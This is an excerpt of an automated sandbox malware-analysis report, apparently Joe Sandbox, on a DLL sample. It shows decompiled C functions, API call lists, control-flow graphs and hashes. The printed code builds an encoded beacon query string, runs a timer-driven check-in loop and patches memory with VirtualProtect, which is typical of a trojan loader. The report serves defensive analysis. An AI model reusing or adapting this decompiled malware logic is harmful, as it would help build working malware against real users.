                • Instruction ID: 4ebb3dbb3ff9d19ed29bc5a71f2f7f7ae25cc7e3072ca276a1853459afbe8bf2
                • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction Fuzzy Hash: D2F012B690020CFFDB119FA5CC85CDFBBBDEB48348F008829F542D1050E671AE599B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DD6E3 Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                Download Yara Rule
                APIs
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,046EE480), ref: 046DD6FA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: InformationProcessQuery
                • String ID:
                • API String ID: 1778838933-0
                • Opcode ID: 04eb8ccb0fea3bec62c1f7ee23a41e16c5943515e00bd19445822f27a24f49f9
                • Instruction ID: bafe934ff2079482ab48645bead01706126761b268ff4ffd2b0944d6abd6db1d
                • Opcode Fuzzy Hash: 04eb8ccb0fea3bec62c1f7ee23a41e16c5943515e00bd19445822f27a24f49f9
                • Instruction Fuzzy Hash: 70F03435B001259BCB20EE59D884DABBBECEB12799B505594E904EB251E321F906CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C174A5 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 68%
                			E01C174A5(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x1c1a01c; // 0x8e501c47
				asm("bswap eax");
				_t31 =  *0x1c1a018; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x1c1a014; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x1c1a010; // 0xeec43f25
				asm("bswap eax");
				_t34 =  *0x1c1a2d8; // 0x55d5a8
				_t3 = _t34 + 0x1c1b633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3f880, _t33, _t32, _t31, _t30,  *0x1c1a030,  *0x1c1a008, _t29);
				_t37 = E01C163D2();
				_t38 =  *0x1c1a2d8; // 0x55d5a8
				_t4 = _t38 + 0x1c1b673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x1c1a2d8; // 0x55d5a8
					_t8 = _t92 + 0x1c1b67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E01C14A14(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x1c1a2d8; // 0x55d5a8
					_t10 = _t87 + 0x1c1b8cc; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x1c1a290, 0, _t104);
				}
				_t105 = E01C13C13();
				if(_t105 != 0) {
					_t82 =  *0x1c1a2d8; // 0x55d5a8
					_t12 = _t82 + 0x1c1b8d4; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x1c1a290, 0, _t105);
				}
				_t106 =  *0x1c1a384; // 0x21795b0
				_a24 = E01C129DC(0x1c1a00e, _t106 + 4);
				_t46 =  *0x1c1a328; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x1c1a2d8; // 0x55d5a8
					_t15 = _t78 + 0x1c1b8ae; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x1c1a324; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x1c1a2d8; // 0x55d5a8
					_t17 = _t75 + 0x1c1b885; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t50 = RtlAllocateHeap( *0x1c1a290, 0, 0x800); // executed
					_t108 = _t50;
					if(_t108 != 0) {
						E01C16341(GetTickCount());
						_t54 =  *0x1c1a384; // 0x21795b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x1c1a384; // 0x21795b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x1c1a384; // 0x21795b0
						_t61 = E01C152C4(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x1c192a8);
							_push(_t111);
							_t66 = E01C15F46();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E01C16BD0(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E01C151B1();
								}
								HeapFree( *0x1c1a290, 0, _v16);
							}
							RtlFreeHeap( *0x1c1a290, 0, _t111); // executed
						}
						RtlFreeHeap( *0x1c1a290, 0, _t108); // executed
					}
					HeapFree( *0x1c1a290, 0, _a16);
				}
				RtlFreeHeap( *0x1c1a290, 0, _t113); // executed
				return _a4;
			}





















































                0x01c174a5
                0x01c174a5
                0x01c174ab
                0x01c174b1
                0x01c174b9
                0x01c174bb
                0x01c174bb
                0x01c174c8
                0x01c174d3
                0x01c174d6
                0x01c174e1
                0x01c174e4
                0x01c174e9
                0x01c174ec
                0x01c174f1
                0x01c174f4
                0x01c17500
                0x01c1750d
                0x01c1750f
                0x01c17515
                0x01c1751a
                0x01c17525
                0x01c17527
                0x01c1752a
                0x01c17531
                0x01c17533
                0x01c1753c
                0x01c17547
                0x01c17549
                0x01c1754c
                0x01c1754c
                0x01c1754e
                0x01c17553
                0x01c17557
                0x01c17559
                0x01c1755e
                0x01c1756a
                0x01c1756c
                0x01c17578
                0x01c1757a
                0x01c1757a
                0x01c17585
                0x01c17589
                0x01c1758b
                0x01c17590
                0x01c1759c
                0x01c1759e
                0x01c175aa
                0x01c175ac
                0x01c175ac
                0x01c175b2
                0x01c175c5
                0x01c175c9
                0x01c175d0
                0x01c175d3
                0x01c175d8
                0x01c175e3
                0x01c175e5
                0x01c175e8
                0x01c175e8
                0x01c175ea
                0x01c175f1
                0x01c175f4
                0x01c175f9
                0x01c17603
                0x01c17605
                0x01c1760d
                0x01c17620
                0x01c17626
                0x01c1762a
                0x01c17636
                0x01c1763b
                0x01c17644
                0x01c17655
                0x01c17659
                0x01c17662
                0x01c17668
                0x01c17670
                0x01c17675
                0x01c17682
                0x01c17688
                0x01c17694
                0x01c1769a
                0x01c1769b
                0x01c176a2
                0x01c176a6
                0x01c176ac
                0x01c176b3
                0x01c176ba
                0x01c176c0
                0x01c176c7
                0x01c176cb
                0x01c176d6
                0x01c176dd
                0x01c176e1
                0x01c176ea
                0x01c176ea
                0x01c176fb
                0x01c176fb
                0x01c1770a
                0x01c1770a
                0x01c17719
                0x01c17719
                0x01c1772b
                0x01c1772b
                0x01c1773a
                0x01c1774a

                APIs
                • GetTickCount.KERNEL32 ref: 01C174BB
                • wsprintfA.USER32 ref: 01C17508
                • wsprintfA.USER32 ref: 01C17525
                • wsprintfA.USER32 ref: 01C17547
                • wsprintfA.USER32 ref: 01C1756A
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1757A
                • wsprintfA.USER32 ref: 01C1759C
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C175AC
                • wsprintfA.USER32 ref: 01C175E3
                • wsprintfA.USER32 ref: 01C17603
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C17620
                • GetTickCount.KERNEL32 ref: 01C17630
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C17644
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C17662
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,01C17675,?,021795B0), ref: 01C152EF
                  • Part of subcall function 01C152C4: lstrlen.KERNEL32(?,?,?,01C17675,?,021795B0), ref: 01C152F7
                  • Part of subcall function 01C152C4: strcpy.NTDLL ref: 01C1530E
                  • Part of subcall function 01C152C4: lstrcat.KERNEL32(00000000,?), ref: 01C15319
                  • Part of subcall function 01C152C4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,01C17675,?,021795B0), ref: 01C15336
                • StrTrimA.SHLWAPI(00000000,01C192A8,?,021795B0), ref: 01C17694
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(02179B10,00000000,00000000,7691C740,01C176A0,00000000), ref: 01C15F56
                  • Part of subcall function 01C15F46: lstrlen.KERNEL32(?), ref: 01C15F5E
                  • Part of subcall function 01C15F46: lstrcpy.KERNEL32(00000000,02179B10), ref: 01C15F72
                  • Part of subcall function 01C15F46: lstrcat.KERNEL32(00000000,?), ref: 01C15F7D
                • lstrcpy.KERNEL32(00000000,?), ref: 01C176B3
                • lstrcpy.KERNEL32(00000000,00000000), ref: 01C176BA
                • lstrcat.KERNEL32(00000000,?), ref: 01C176C7
                • lstrcat.KERNEL32(00000000,00000000), ref: 01C176CB
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 01C176FB
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 01C1770A
                • RtlFreeHeap.NTDLL(00000000,00000000,?,021795B0), ref: 01C17719
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C1772B
                • RtlFreeHeap.NTDLL(00000000,?), ref: 01C1773A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                • String ID: Ut
                • API String ID: 628443468-8415677
                • Opcode ID: 6af0a701ad1cc7f1086a3f505f10bb490d0db6edd492e3588e11efe0b39ce885
                • Instruction ID: caf8d0abe348423fd21b0a85dfd8a8bda7febe2592291603a3081b225efedc5d
                • Opcode Fuzzy Hash: 6af0a701ad1cc7f1086a3f505f10bb490d0db6edd492e3588e11efe0b39ce885
                • Instruction Fuzzy Hash: 2471BD71181254EFD7229B68DC88F9637B8FB6B714F040518F90ED3258DB3AEA04AB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1541F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151timememoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 142 1c1541f-1c15451 memset CreateWaitableTimerA 143 1c155d2-1c155d8 GetLastError 142->143 144 1c15457-1c154b0 _allmul SetWaitableTimer WaitForMultipleObjects 142->144 147 1c155dc-1c155e6 143->147 145 1c154b6-1c154b9 144->145 146 1c1553a-1c15540 144->146 148 1c154c4 145->148 149 1c154bb call 1c15cf6 145->149 150 1c15541-1c15545 146->150 154 1c154ce 148->154 155 1c154c0-1c154c2 149->155 152 1c15555-1c15559 150->152 153 1c15547-1c15549 150->153 152->150 156 1c1555b-1c15565 CloseHandle 152->156 153->152 157 1c154d2-1c154d7 154->157 155->148 155->154 156->147 158 1c154d9-1c154e0 157->158 159 1c154ea-1c15517 call 1c17253 157->159 158->159 160 1c154e2 158->160 163 1c15567-1c1556c 159->163 164 1c15519-1c15524 159->164 160->159 165 1c1558b-1c15593 163->165 166 1c1556e-1c15574 163->166 164->157 167 1c15526-1c15531 call 1c1611c 164->167 169 1c15599-1c155c7 _allmul SetWaitableTimer WaitForMultipleObjects 165->169 166->146 168 1c15576-1c15589 call 1c151b1 166->168 173 1c15536 167->173 168->169 169->157 172 1c155cd 169->172 172->146 173->146
                C-Code - Quality: 83%
                			E01C1541F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x1c1a298);
					_v76 = 0;
					_v80 = 0;
					L01C1807C();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x1c1a2c4; // 0x10c
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x1c1a2a4 = 5;
						} else {
							_t69 = E01C15CF6(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x1c1a2b8 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E01C17253( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_t97 = _t66 - 3;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E01C1611C(_t75, _t97,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x1c1a29c);
							goto L21;
						} else {
							__eflags =  *0x1c1a2a0; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E01C151B1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x1c1a2a0);
								L21:
								L01C1807C();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t65;
								_v128 = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x1c1a290, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                0x01c1541f
                0x01c15435
                0x01c15439
                0x01c1543e
                0x01c15445
                0x01c1544d
                0x01c15451
                0x01c155d8
                0x01c15457
                0x01c15457
                0x01c15459
                0x01c1545e
                0x01c1545f
                0x01c15465
                0x01c15469
                0x01c1546d
                0x01c1547b
                0x01c15489
                0x01c1548d
                0x01c1548f
                0x01c1549c
                0x01c154a8
                0x01c154ac
                0x01c154b0
                0x01c154b9
                0x01c154c4
                0x01c154c4
                0x01c154bb
                0x01c154bb
                0x01c154c2
                0x00000000
                0x00000000
                0x01c154c2
                0x01c154ce
                0x00000000
                0x01c154d2
                0x01c154d7
                0x01c154e2
                0x01c154e2
                0x01c154ea
                0x01c154f0
                0x01c154f8
                0x01c15501
                0x01c15508
                0x01c1550c
                0x01c15513
                0x01c15517
                0x00000000
                0x00000000
                0x01c15519
                0x01c1551d
                0x01c15520
                0x01c15524
                0x00000000
                0x01c15526
                0x01c15531
                0x01c15536
                0x01c15536
                0x00000000
                0x01c15567
                0x01c15567
                0x01c1556c
                0x01c1558b
                0x01c1558d
                0x01c15592
                0x01c15593
                0x00000000
                0x01c1556e
                0x01c1556e
                0x01c15574
                0x00000000
                0x01c15576
                0x01c15576
                0x01c1557b
                0x01c1557d
                0x01c15582
                0x01c15583
                0x01c15599
                0x01c15599
                0x01c155a1
                0x01c155af
                0x01c155b3
                0x01c155bf
                0x01c155c1
                0x01c155c3
                0x01c155c7
                0x00000000
                0x01c155cd
                0x00000000
                0x01c155cd
                0x01c155c7
                0x01c15574
                0x00000000
                0x01c1556c
                0x01c1553a
                0x01c1553c
                0x01c15540
                0x01c15541
                0x01c15541
                0x01c15545
                0x01c1554f
                0x01c1554f
                0x01c15555
                0x01c15558
                0x01c15558
                0x01c1555f
                0x01c1555f
                0x01c155e6
                0x00000000

                APIs
                • memset.NTDLL ref: 01C15439
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01C15445
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 01C1546D
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 01C1548D
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01C1365E,?), ref: 01C154A8
                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01C1365E,?,00000000), ref: 01C1554F
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01C1365E,?,00000000,?,?), ref: 01C1555F
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01C15599
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 01C155B3
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01C155BF
                  • Part of subcall function 01C15CF6: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,021793E0,00000000,?,74E5F710,00000000,74E5F730), ref: 01C15D45
                  • Part of subcall function 01C15CF6: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02179418,?,00000000,30314549,00000014,004F0053,021793D4), ref: 01C15DE2
                  • Part of subcall function 01C15CF6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01C154C0), ref: 01C15DF4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01C1365E,?,00000000,?,?), ref: 01C155D2
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID: Ut
                • API String ID: 3521023985-8415677
                • Opcode ID: f26a048f2542c7f662e49c1d03638b83acbaca13598d6fdef560068855ca609a
                • Instruction ID: 897cd38358ffa1f09720308725378fb0fb503827e7b57d86da645e0061bfbb5d
                • Opcode Fuzzy Hash: f26a048f2542c7f662e49c1d03638b83acbaca13598d6fdef560068855ca609a
                • Instruction Fuzzy Hash: 8251BE71489321EFD7219F15DC44AABBBE8FB8B324F104A1AF499C2198D770C604DF92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C609C Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 175 46c609c-46c60ad 176 46c60af-46c60bb call 46c6220 call 46d8e5e 175->176 177 46c6101-46c610c 175->177 191 46c60c1-46c60ce SleepEx 176->191 179 46c610e call 46c6584 177->179 180 46c6113-46c6125 call 46cef26 177->180 179->180 186 46c6136-46c613d 180->186 187 46c6127-46c6134 ReleaseMutex CloseHandle 180->187 189 46c614e-46c615b SleepEx 186->189 190 46c613f-46c614c ResetEvent CloseHandle 186->190 187->186 189->189 192 46c615d 189->192 190->189 191->191 193 46c60d0-46c60d7 191->193 194 46c6162-46c616f SleepEx 192->194 195 46c60ed-46c60ff RtlDeleteCriticalSection * 2 193->195 196 46c60d9-46c60df 193->196 197 46c6178-46c617f 194->197 198 46c6171-46c6176 194->198 195->177 196->195 199 46c60e1-46c60e8 call 46c57e0 196->199 200 46c6190-46c6197 197->200 201 46c6181-46c618a HeapFree 197->201 198->194 198->197 199->195 203 46c619f-46c61a5 200->203 204 46c6199-46c619a call 46e4177 200->204 201->200 205 46c61b6-46c61bd 203->205 206 46c61a7-46c61ae 203->206 204->203 209 46c61bf-46c61c0 RtlRemoveVectoredExceptionHandler 205->209 210 46c61c6-46c61cc 205->210 206->205 208 46c61b0-46c61b2 206->208 208->205 209->210 211 46c61ce call 46d0bbd 210->211 212 46c61d3 210->212 211->212 214 46c61d8-46c61e5 SleepEx 212->214 215 46c61ee-46c61f7 214->215 216 46c61e7-46c61ec 214->216 217 46c620f-46c621f LocalFree 215->217 218 46c61f9-46c61fe 215->218 216->214 216->215 218->217 219 46c6200 218->219 220 46c6203-46c620d CloseHandle 219->220 220->217 220->220
                APIs
                • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C60C5
                • RtlDeleteCriticalSection.NTDLL(046EE460), ref: 046C60F8
                • RtlDeleteCriticalSection.NTDLL(046EE480), ref: 046C60FF
                • ReleaseMutex.KERNEL32(00000448,00000000,?,?,?,046CE039), ref: 046C6128
                • CloseHandle.KERNEL32(?,?,046CE039), ref: 046C6134
                • ResetEvent.KERNEL32(00000000,00000000,?,?,?,046CE039), ref: 046C6140
                • CloseHandle.KERNEL32(?,?,046CE039), ref: 046C614C
                • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,046CE039), ref: 046C6152
                • SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C6166
                • HeapFree.KERNEL32(00000000,00000000,?,?,046CE039), ref: 046C618A
                • RtlRemoveVectoredExceptionHandler.NTDLL(01333FC8), ref: 046C61C0
                • SleepEx.KERNEL32(00000064,00000001,?,?,046CE039), ref: 046C61DC
                • CloseHandle.KERNEL32(04C98418,?,?,046CE039), ref: 046C6205
                • LocalFree.KERNEL32(?,?,046CE039), ref: 046C6215
                  • Part of subcall function 046C6220: GetVersion.KERNEL32(?,?,74E5F720,?,046C60B4,00000000,?,?,?,046CE039), ref: 046C6244
                  • Part of subcall function 046C6220: GetModuleHandleA.KERNEL32(?,04C997B5,?,74E5F720,?,046C60B4,00000000,?,?,?,046CE039), ref: 046C6261
                  • Part of subcall function 046C6220: GetProcAddress.KERNEL32(00000000), ref: 046C6268
                  • Part of subcall function 046D8E5E: RtlEnterCriticalSection.NTDLL(046EE480), ref: 046D8E68
                  • Part of subcall function 046D8E5E: RtlLeaveCriticalSection.NTDLL(046EE480), ref: 046D8EA4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                • String ID:
                • API String ID: 1765366784-0
                • Opcode ID: 35b507456c106e626d06200ec85bd08073c58660c72d7aca695dd270439bbd69
                • Instruction ID: 1d490a7fec90a30f1613f7666cfdbe7ce58f2e27660527acd36d63bc55640f84
                • Opcode Fuzzy Hash: 35b507456c106e626d06200ec85bd08073c58660c72d7aca695dd270439bbd69
                • Instruction Fuzzy Hash: E7417D31B40211AFE720AF6AEC84A6577E9EB24745B05102DF500DB691FB7BFC40CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E0B4D Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 273 46e0b4d-46e0b6e call 46e730c 276 46e0c4e 273->276 277 46e0b74-46e0b75 273->277 278 46e0c54-46e0c63 VirtualProtect 276->278 279 46e0bda-46e0be1 277->279 280 46e0b77-46e0b7a 277->280 281 46e0c65-46e0c7b VirtualProtect 278->281 282 46e0c80-46e0c86 GetLastError 278->282 285 46e0be3-46e0be9 279->285 286 46e0c21-46e0c36 VirtualProtect 279->286 283 46e0ca5-46e0cb1 call 46e7347 280->283 284 46e0b80 280->284 287 46e0b86-46e0b8c 281->287 282->283 284->287 285->286 289 46e0beb-46e0bf7 285->289 286->278 290 46e0c38-46e0c4c 286->290 292 46e0bce-46e0bd5 287->292 293 46e0b8e-46e0b92 287->293 289->278 295 46e0bf9-46e0c06 VirtualProtect 289->295 291 46e0c1d-46e0c1f VirtualProtect 290->291 291->278 292->283 293->292 296 46e0b94-46e0bb0 lstrlen VirtualProtect 293->296 295->278 297 46e0c08-46e0c1c 295->297 296->292 298 46e0bb2-46e0bcc lstrcpy VirtualProtect 296->298 297->291 298->292
                APIs
                • lstrlen.KERNEL32(?,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046E0B9A
                • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BAC
                • lstrcpy.KERNEL32(00000000,?), ref: 046E0BBB
                • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0BCC
                • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,046EA510,00000018,046E5756,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000), ref: 046E0C02
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0C1D
                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,046EA510,00000018,046E5756,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000), ref: 046E0C32
                • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,046EA510,00000018,046E5756,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000), ref: 046E0C5F
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6), ref: 046E0C79
                • GetLastError.KERNEL32(?,00000000,?,046CB5BA,046ED4E4,046C159F,046C158F,00000004,00000000,?,00000000,046E48E6,046DCCD7,046C159F,046C158F), ref: 046E0C80
                Memory Dump Source
